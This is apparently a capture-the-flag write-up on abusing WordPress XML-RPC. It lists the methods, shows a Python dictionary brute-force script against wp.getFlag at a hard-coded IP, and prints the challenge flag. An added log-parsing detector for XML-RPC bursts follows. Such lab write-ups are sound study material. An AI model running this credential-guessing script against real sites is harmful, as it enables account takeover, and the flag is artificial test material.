HZVII - $uper $ecure WP Blog

Description

WordPress accounted for 90% of all hacked CMS sites in 2018. WordPress features that are not being used should be disabled or removed completely to avoid any potential risk; otherwise they should at the very least be blocked from external access.

Task link

Steps

In WordPress challenges people generally think about vulnerable plugins, which is not the case here. So what is XML-RPC?

XML-RPC on WordPress is actually an API, or "application program interface". It gives developers who make mobile apps, desktop apps and other services the ability to talk to your WordPress site. The XML-RPC API that WordPress provides gives developers a way to write applications (for you) that can do many of the things you can do when logged into WordPress via the web interface, including publishing, editing or deleting a post, uploading a new file (e.g. an image for a post), getting the list of comments and editing comments.

The first thing to do now is send a POST request that lists all the available methods. Why? Because that is how we find out which actions are even possible and can potentially use one of them for an attack.

The flag is not here :’(

A dictionary link was found in the getFavouriteWords method; maybe we need it later.

Another method, wp.getFlag, seems interesting.

The request needs more arguments, most likely the user and password :)

We know our user ;)

We can differentiate successful credentials from failed ones by the response length.

import requests
from xml.sax.saxutils import escape

headers = {'Content-Type': 'text/xml'}

# Try every word of the dictionary found via getFavouriteWords as the password for wp.getFlag.
with open("dic.txt", "r") as cracklist:
    for password in cracklist:
        password = password.rstrip("\r\n")
        # Escape XML special characters so a password containing & or < keeps the body well-formed.
        xml = """<methodCall>
<methodName>wp.getFlag</methodName>
<params>
<param><value>psycor</value></param>
<param><value>""" + escape(password) + """</value></param>
</params>
</methodCall>"""
        response = requests.post('http://51.83.41.116/xmlrpc.php', data=xml, headers=headers)
        # A failed login always comes back as a 403-byte body; any other length means the credentials worked.
        if len(response.content) != 403:
            print("Password found: " + password)
            print(response.text)
            break

The flag is : HZVII{50m371m35_xml_rpc_15_d4n63r0u5}
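The brute force above leaves a distinctive trace in the web server log: a burst of POST requests to /xmlrpc.php from one address, each answered with the same 403-byte body. The following is an added example, not part of the original writeup, that parses combined-format access-log lines and flags any source IP that exceeds a threshold of XML-RPC POSTs inside a sliding time window; the log lines, IP addresses, window and threshold are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache/nginx combined log format: ip ident user [timestamp] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)


def parse_line(line):
    """Return (ip, timestamp, method, path) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("method"), m.group("path").split("?")[0]


def xmlrpc_bursts(lines, threshold=5, window=timedelta(seconds=60)):
    """Map each source IP to its peak count of POST /xmlrpc.php requests inside any
    `window`; only IPs whose peak reaches `threshold` are returned."""
    hits = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed and parsed[2] == "POST" and parsed[3] == "/xmlrpc.php":
            hits[parsed[0]].append(parsed[1])
    flagged = {}
    for ip, times in hits.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):          # sliding window over sorted timestamps
            while t - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


def _line(ip, sec, method, path, size):
    """Build a constructed sample log line (not real traffic)."""
    return (f'{ip} - - [12/Mar/2020:10:00:{sec:02d} +0000] "{method} {path} HTTP/1.1" '
            f'200 {size} "-" "python-requests/2.22.0"')


# Constructed sample: six rapid XML-RPC POSTs (all 403-byte replies) from one address,
# plus one legitimate XML-RPC call and one page view from another address.
SAMPLE_LOG = [_line("203.0.113.7", s, "POST", "/xmlrpc.php", 403) for s in range(6)] + [
    _line("198.51.100.4", 3, "POST", "/xmlrpc.php", 512),
    _line("198.51.100.4", 4, "GET", "/index.php", 5123),
]

if __name__ == "__main__":
    print(xmlrpc_bursts(SAMPLE_LOG))  # {'203.0.113.7': 6}
```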